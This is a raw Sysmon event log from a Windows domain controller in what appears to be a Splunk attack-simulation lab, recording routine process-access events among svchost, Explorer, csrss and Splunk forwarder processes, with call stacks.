13:33:20.203{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013411Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:20.203{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013410Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:20.203{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013409Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:20.203{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013408Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:20.203{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4820-6000-5105-000000009A01}6308C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013407Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:20.203{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4820-6000-5105-000000009A01}6308C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013406Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:33:20.204{08A6967A-4820-6000-5105-000000009A01}6308C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013458Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:01.375{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013457Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:01.375{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013456Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:01.375{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013455Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:01.375{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013454Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:01.375{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013453Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:01.375{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013452Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:01.375{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013451Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:01.375{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013450Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:01.375{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013449Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:01.375{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013448Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:01.375{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1905-000000009A01}2124C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013447Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:01.375{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1905-000000009A01}2124C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013446Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:01.375{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013445Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:01.375{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013444Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:01.375{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013443Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:01.375{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013442Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:01.375{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013441Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:01.375{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013440Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:01.375{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013439Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:01.375{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013438Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:01.375{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013437Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:01.375{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013436Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:01.375{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013435Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:01.375{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013434Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 